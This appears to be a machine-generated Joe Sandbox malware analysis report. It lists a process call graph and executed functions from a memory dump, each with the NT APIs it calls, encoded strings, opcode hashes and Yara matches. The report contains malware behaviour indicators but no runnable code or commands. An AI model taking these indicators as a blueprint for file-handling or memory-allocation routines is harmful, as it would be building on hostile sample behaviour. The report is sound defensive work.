90659 2d823b0 90659->90658 90676 2d917d0 90659->90676 90662 2d825c7 90684 2d9cd10 90662->90684 90663 2d8240e 90663->90658 90679 2d9cbe0 90663->90679 90666 2d825dc 90668 2d82629 90666->90668 90690 2d80eb0 90666->90690 90668->90658 90670 2d80eb0 LdrInitializeThunk 90668->90670 90693 2d88760 90668->90693 90669 2d82777 90669->90668 90671 2d88760 LdrInitializeThunk 90669->90671 90670->90668 90671->90669 90673 2d887cd 90672->90673 90674 2d887ee SetErrorMode 90673->90674 90675 2d887f5 90673->90675 90674->90675 90675->90659 90677 2d9bac0 NtAllocateVirtualMemory 90676->90677 90678 2d917f1 90677->90678 90678->90663 90680 2d9cbf0 90679->90680 90681 2d9cbf6 90679->90681 90680->90662 90682 2d9bc20 RtlAllocateHeap 90681->90682 90683 2d9cc1c 90682->90683 90683->90662 90685 2d9cc80 90684->90685 90686 2d9ccdd 90685->90686 90687 2d9bc20 RtlAllocateHeap 90685->90687 90686->90666 90688 2d9ccba 90687->90688 90689 2d9bb40 RtlFreeHeap 90688->90689 90689->90686 90697 2d99d70 90690->90697 90694 2d88773 90693->90694 90702 2d99060 90694->90702 90696 2d8879e 90696->90668 90698 2d99d8d 90697->90698 90701 4ec2c70 LdrInitializeThunk 90698->90701 90699 2d80ecf 90699->90669 90701->90699 90703 2d990db 90702->90703 90705 2d9908e 90702->90705 90707 4ec2dd0 LdrInitializeThunk 90703->90707 90704 2d99100 90704->90696 90705->90696 90707->90704 91005 2d86220 91006 2d88760 LdrInitializeThunk 91005->91006 91007 2d86250 91005->91007 91006->91007 91009 2d8627c 91007->91009 91010 2d886e0 91007->91010 91012 2d88724 91010->91012 91011 2d88745 91011->91007 91012->91011 91017 2d98e30 91012->91017 91014 2d88735 91015 2d88751 91014->91015 91016 2d99b00 NtClose 91014->91016 91015->91007 91016->91011 91018 2d98e5e 91017->91018 91019 2d98eaa 91017->91019 91018->91014 91022 4ec4650 LdrInitializeThunk 91019->91022 91020 2d98ecf 91020->91014 91022->91020 91023 2d877a0 91024 2d877b9 91023->91024 91027 2d8780c 91023->91027 91026 2d99b00 NtClose 91024->91026 91024->91027 91025 2d87944 91028 2d877d4 91026->91028 91027->91025 91034 2d86bc0 NtClose LdrInitializeThunk LdrInitializeThunk 91027->91034 91033 2d86bc0 NtClose LdrInitializeThunk LdrInitializeThunk 91028->91033 91030 2d8791e 91030->91025 91035 2d86d90 NtClose LdrInitializeThunk LdrInitializeThunk 91030->91035 91033->91027 91034->91030 91035->91025 90708 2d99a60 90709 2d99ad1 90708->90709 90711 2d99a8b 90708->90711 90710 2d99ae7 NtDeleteFile 90709->90710 91036 2d960a0 91037 2d96105 91036->91037 91038 2d96140 91037->91038 91041 2d91aa0 91037->91041 91040 2d96122 91042 2d91ab7 91041->91042 91043 2d91a45 91041->91043 91044 2d99b00 NtClose 91043->91044 91045 2d91a8c 91044->91045 91045->91040 91046 2d90220 91047 2d9023f 91046->91047 91049 2d97b00 91046->91049 91050 2d97b65 91049->91050 91051 2d97b94 91050->91051 91054 2d8dfc0 91050->91054 91051->91047 91053 2d97b76 91053->91047 91055 2d8dfbb 91054->91055 91058 2d8df30 91054->91058 91055->91053 91056 2d8dfac 91056->91053 91057 2d954b0 GetFileAttributesW 91057->91058 91058->91056 91058->91057 90712 4ec2ad0 LdrInitializeThunk

                                                                                                              Executed Functions

                                                                                                              Function 02D79F60 Relevance: 24.2, Strings: 19, Instructions: 448COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 165 2d79f60-2d7a281 166 2d7a288-2d7a28f 165->166 167 2d7a2b4-2d7a2cd 166->167 168 2d7a291-2d7a2a7 166->168 167->167 171 2d7a2cf-2d7a2e0 167->171 169 2d7a2b2 168->169 170 2d7a2a9-2d7a2af 168->170 169->166 170->169 172 2d7a2f1-2d7a2fd 171->172 173 2d7a2ff-2d7a30c 172->173 174 2d7a30e-2d7a315 172->174 173->172 175 2d7a317-2d7a334 174->175 176 2d7a336-2d7a340 174->176 175->174 178 2d7a351-2d7a35a 176->178 179 2d7a35c-2d7a368 178->179 180 2d7a378-2d7a389 178->180 181 2d7a376 179->181 182 2d7a36a-2d7a370 179->182 183 2d7a39a-2d7a3a3 180->183 181->178 182->181 185 2d7a3c7-2d7a3d1 183->185 186 2d7a3a5-2d7a3b1 183->186 189 2d7a3d3-2d7a3ee 185->189 190 2d7a409-2d7a412 185->190 187 2d7a3b3-2d7a3b7 186->187 188 2d7a3b8-2d7a3ba 186->188 187->188 193 2d7a3c5 188->193 194 2d7a3bc-2d7a3c2 188->194 195 2d7a3f5-2d7a3f7 189->195 196 2d7a3f0-2d7a3f4 189->196 191 2d7a437 190->191 192 2d7a414-2d7a435 190->192 197 2d7a43e-2d7a457 191->197 192->190 193->183 194->193 199 2d7a407 195->199 200 2d7a3f9-2d7a401 195->200 196->195 197->197 201 2d7a459-2d7a463 197->201 199->185 200->199 202 2d7a474-2d7a47d 201->202 203 2d7a494-2d7a49b 202->203 204 2d7a47f-2d7a492 202->204 205 2d7a4cd-2d7a4d7 203->205 206 2d7a49d-2d7a4cb 203->206 204->202 208 2d7a4e8-2d7a4f1 205->208 206->203 209 2d7a4f3-2d7a500 208->209 210 2d7a502-2d7a51b 208->210 209->208 210->210 211 2d7a51d-2d7a529 210->211 213 2d7a52b-2d7a546 211->213 214 2d7a548-2d7a551 211->214 213->211 215 2d7a557-2d7a55e 214->215 216 2d7a6e1-2d7a6eb 214->216 218 2d7a560-2d7a572 215->218 219 2d7a588-2d7a592 215->219 217 2d7a6fc-2d7a708 216->217 220 2d7a71e-2d7a725 217->220 221 2d7a70a-2d7a71c 217->221 222 2d7a574-2d7a578 218->222 223 2d7a579-2d7a57b 218->223 224 2d7a5a3-2d7a5ac 219->224 226 2d7a72b-2d7a732 220->226 227 2d7a809-2d7a813 220->227 221->217 222->223 228 2d7a586 223->228 229 2d7a57d-2d7a583 223->229 230 2d7a5c3-2d7a5c6 224->230 231 2d7a5ae-2d7a5c1 224->231 232 2d7a764 call 2d9b7b0 226->232 233 2d7a734-2d7a762 226->233 228->215 229->228 234 2d7a5cc-2d7a5d3 230->234 231->224 241 2d7a769-2d7a773 232->241 233->226 237 2d7a605-2d7a614 234->237 238 2d7a5d5-2d7a603 234->238 239 2d7a616 237->239 240 2d7a61b-2d7a622 237->240 238->234 239->216 242 2d7a647-2d7a651 240->242 243 2d7a624-2d7a63a 240->243 244 2d7a784-2d7a78d 241->244 247 2d7a662-2d7a66b 242->247 245 2d7a645 243->245 246 2d7a63c-2d7a642 243->246 248 2d7a7a0-2d7a7a7 244->248 249 2d7a78f-2d7a79e 244->249 245->240 246->245 250 2d7a681-2d7a68a 247->250 251 2d7a66d-2d7a67f 247->251 252 2d7a7d4-2d7a7de 248->252 253 2d7a7a9-2d7a7d2 248->253 249->244 256 2d7a6a6-2d7a6ac 250->256 257 2d7a68c-2d7a6a4 250->257 251->247 258 2d7a7ef-2d7a7f9 252->258 253->248 260 2d7a6b0-2d7a6b4 256->260 257->250 258->227 259 2d7a7fb-2d7a807 258->259 259->258 262 2d7a6b6-2d7a6da 260->262 263 2d7a6dc 260->263 262->260 263->214
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: d$&B$)$*#$1$:$:}$OV$Q$U$]$_$_-$_<$b*$e$i3$i:$v2
                                                                                                              • API String ID: 0-3217503214
                                                                                                              • Opcode ID: 7cbec4fbcd39e802f28624e720d538de91ffa90ce2ab2b3395865f71e5ec2323
                                                                                                              • Instruction ID: 6d40ffd928175bec5fbccdfd82f13228dee43bf5bc7f9bc818c3f214a381ca0f
                                                                                                              • Opcode Fuzzy Hash: 7cbec4fbcd39e802f28624e720d538de91ffa90ce2ab2b3395865f71e5ec2323
                                                                                                              • Instruction Fuzzy Hash: 7432AEB0D05669CBEB64CF44C898BEDBBB2BB44308F1081D9D4496B381EB795E89CF54
                                                                                                              Function 02D8CC50 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 02D8CD34
                                                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 02D8CD6F
                                                                                                              • FindClose.KERNELBASE(?), ref: 02D8CD7A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 3541575487-0
                                                                                                              • Opcode ID: 4c97a8d3e1393ac865fc2644c4165fbf533cb2054b97f8bd2608cce92750d3fe
                                                                                                              • Instruction ID: 3670fec2f8bc2198452eaa639ff6806aca6954d8e78a0454814a7d1618c1caa4
                                                                                                              • Opcode Fuzzy Hash: 4c97a8d3e1393ac865fc2644c4165fbf533cb2054b97f8bd2608cce92750d3fe
                                                                                                              • Instruction Fuzzy Hash: 91317371610308BBDB24EB60CC85FEF777CEB44744F104199B909A6290EB70AE45CBB0
                                                                                                              Function 02D99810 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtCreateFile.NTDLL(?,?,59BA9130,?,?,?,?,?,?,?,?), ref: 02D99908
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: 5135da323445ef3c3097e7e7741681ab41f732bdf2234858e608911eb240bd1a
                                                                                                              • Instruction ID: a641c863541fbcb24f27cee02132c5afaee0dcab1e500e1f2a1098e5431ddae6
                                                                                                              • Opcode Fuzzy Hash: 5135da323445ef3c3097e7e7741681ab41f732bdf2234858e608911eb240bd1a
                                                                                                              • Instruction Fuzzy Hash: 2E31E4B5A01248AFCB14DF98D880EEFB7B9EF88704F108219F908A7340D730A851CFA0
                                                                                                              Function 02D99970 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtReadFile.NTDLL(?,?,59BA9130,?,?,?,?,?,?), ref: 02D99A53
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2738559852-0
                                                                                                              • Opcode ID: fba5c8c8623f852feb632874af99dc9b5267436a6d353ff22b3e7c83f4994071
                                                                                                              • Instruction ID: 651284c2a97ffa4ce581011bf77203f9e8823c11ea8f1569d16a0e95e967b647
                                                                                                              • Opcode Fuzzy Hash: fba5c8c8623f852feb632874af99dc9b5267436a6d353ff22b3e7c83f4994071
                                                                                                              • Instruction Fuzzy Hash: 6B31D6B5A00248ABDB14DF98D881EEFB7B9EF88714F108219FD18A7344D770A951CFA1
                                                                                                              Function 02D99C50 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtAllocateVirtualMemory.NTDLL(02D8240E,?,59BA9130,00000000,00000004,00003000,?,?,?,?,?,02D9860F,02D8240E,?,?,02D9BAEE), ref: 02D99D12
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2167126740-0
                                                                                                              • Opcode ID: 78c3e9e1af6e42e75c04ad679f68a9628a38d05a20cb79896eb21beca53510fe
                                                                                                              • Instruction ID: 2a7efe71b752712a6f632bc45717b453e4c58aa3722e8399ab94c547675410d2
                                                                                                              • Opcode Fuzzy Hash: 78c3e9e1af6e42e75c04ad679f68a9628a38d05a20cb79896eb21beca53510fe
                                                                                                              • Instruction Fuzzy Hash: C721E8B5A00249ABDB14DF98DC41EAFB7B9EF88704F108519FD08AB344D674A951CFA1
                                                                                                              Function 02D99A60 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DeleteFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 4033686569-0
                                                                                                              • Opcode ID: 40aeafa31968e7346c6f32c97f288871a68a477233a112c1e668a31cc1cc25af
                                                                                                              • Instruction ID: fa823154da1240cf8edf3b2710b2a7b4c69ae9860f65c50baf921425b9fcfd30
                                                                                                              • Opcode Fuzzy Hash: 40aeafa31968e7346c6f32c97f288871a68a477233a112c1e668a31cc1cc25af
                                                                                                              • Instruction Fuzzy Hash: EF11A3316006497BDB20EB98CC41FEFB76DDF85704F004209F908AB280EA747945CBB1
                                                                                                              Function 02D99B00 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02D99B34
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                                                              • Instruction ID: 3b925cdafb9357968ec82b1fb2880c6b6fe128d98c48f56cfe77a31be291fcd6
                                                                                                              • Opcode Fuzzy Hash: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                                                              • Instruction Fuzzy Hash: 63E08C3A2012047BD620FA69CC40FDBB7ADDFC6B54F004419FA1CAB242D6B0B9418BF1
                                                                                                              Function 04EC4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 605669eba983c99381090a91a5477ea94584132db87623fcfb553b02d6948d81
                                                                                                              • Instruction ID: 82cee819c56b28206e33c59070778754fbdb3d55e0a11572bc3a5931835e6ab2
                                                                                                              • Opcode Fuzzy Hash: 605669eba983c99381090a91a5477ea94584132db87623fcfb553b02d6948d81
                                                                                                              • Instruction Fuzzy Hash: C0900275601510426180715848054066015ABE1305395D115A0A55560C8619D9569269
                                                                                                              Function 04EC4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 1d9923ed5b7cd449b486cbb7c9c2d15fde1e9c73601b53a6cde007e472efb0df
                                                                                                              • Instruction ID: da75f6ac95c548582574887c504dfff0ccd8c3d8416783779a69cda653a35aba
                                                                                                              • Opcode Fuzzy Hash: 1d9923ed5b7cd449b486cbb7c9c2d15fde1e9c73601b53a6cde007e472efb0df
                                                                                                              • Instruction Fuzzy Hash: 6690023560581012B180715848855464015ABE0305B55D011E0925554C8A15DA575361
                                                                                                              Function 04EC2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 71324957fe8480a7d53b06fc26188f60d86833495815d18a478c92622f3feaf8
                                                                                                              • Instruction ID: 8752732d6e658c84820b68c6fcdcf8b8e9a642be3497f705adada919a16a2b49
                                                                                                              • Opcode Fuzzy Hash: 71324957fe8480a7d53b06fc26188f60d86833495815d18a478c92622f3feaf8
                                                                                                              • Instruction Fuzzy Hash: FE90023520141402F1407598540964600159BE0305F55E011A5525555EC666D9926131
                                                                                                              Function 04EC2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 7654d483e40f9b0af42da82d064bda920c62cdc2fcc8485a904c325d4a276868
                                                                                                              • Instruction ID: efec793081fe948692ceb8b6d48a6b9dc200a9f5e08ac01e0b68837881964346
                                                                                                              • Opcode Fuzzy Hash: 7654d483e40f9b0af42da82d064bda920c62cdc2fcc8485a904c325d4a276868
                                                                                                              • Instruction Fuzzy Hash: 0F90023520141842F14071584405B4600159BE0305F55D016A0625654D8616D9527521
                                                                                                              Function 04EC2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 0ef2622ce1ccfdb30a23b0ef4280a0ed3ef4a38a58a512d1b13fba10ddb4b48b
                                                                                                              • Instruction ID: 23afcf75f13b066b083ad3d1d68dd16e57bfe3b3ed743730f363c88c044c813f
                                                                                                              • Opcode Fuzzy Hash: 0ef2622ce1ccfdb30a23b0ef4280a0ed3ef4a38a58a512d1b13fba10ddb4b48b
                                                                                                              • Instruction Fuzzy Hash: 3C90023520149802F1507158840574A00159BD0305F59D411A4925658D8696D9927121
                                                                                                              Function 04EC2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: e5379dfbd7455ef7da8707574de66c9d698f605acd769a38c948be9c8d18ac1e
                                                                                                              • Instruction ID: 46b5aed7b593715fbc9c661383c5d09c003509126c0e0609e3c968f092a0ed08
                                                                                                              • Opcode Fuzzy Hash: e5379dfbd7455ef7da8707574de66c9d698f605acd769a38c948be9c8d18ac1e
                                                                                                              • Instruction Fuzzy Hash: A490023520141413F1517158450570700199BD0245F95D412A0925558D9657DA53A121
                                                                                                              Function 04EC2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 73b3d7bed2c23510dd3b86415e345ff5524c8f5bb464667c26ba246c6487b7ad
                                                                                                              • Instruction ID: 5d71bcb8ed49509d46d6ee3cd0b6060edeab9a6d6ad9e7c8433a783b4a4b55ea
                                                                                                              • Opcode Fuzzy Hash: 73b3d7bed2c23510dd3b86415e345ff5524c8f5bb464667c26ba246c6487b7ad
                                                                                                              • Instruction Fuzzy Hash: 8B900235242451527585B15844055074016ABE0245795D012A1915950C8527E957D621
                                                                                                              Function 04EC2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 69ddd2a4c9b1488c6089753dcd7b9d2d34027db167b5d1a7aa15e7d25b42cb47
                                                                                                              • Instruction ID: 32b868e72a5d6827b2cc80d5c41edc5a95f1f37b82475ef4a1f75181fca959e4
                                                                                                              • Opcode Fuzzy Hash: 69ddd2a4c9b1488c6089753dcd7b9d2d34027db167b5d1a7aa15e7d25b42cb47
                                                                                                              • Instruction Fuzzy Hash: 8190023530141003F180715854196064015EBE1305F55E011E0915554CD916D9575222
                                                                                                              Function 04EC2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: cba4b48795d235b81b00f34ff92d6b11fafbc83b49c30ebfdad7b54a00dbbe33
                                                                                                              • Instruction ID: 6b992b29a5dc136d6aec902120d291b51fea7920bcdad27d8baaf2aea8aea410
                                                                                                              • Opcode Fuzzy Hash: cba4b48795d235b81b00f34ff92d6b11fafbc83b49c30ebfdad7b54a00dbbe33
                                                                                                              • Instruction Fuzzy Hash: 2E90023D21341002F1C07158540960A00159BD1206F95E415A0516558CC916D96A5321
                                                                                                              Function 04EC2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 5f487f5a3297f313b5850665135ea5f8b112e121296bcb17a0537eb2550659d7
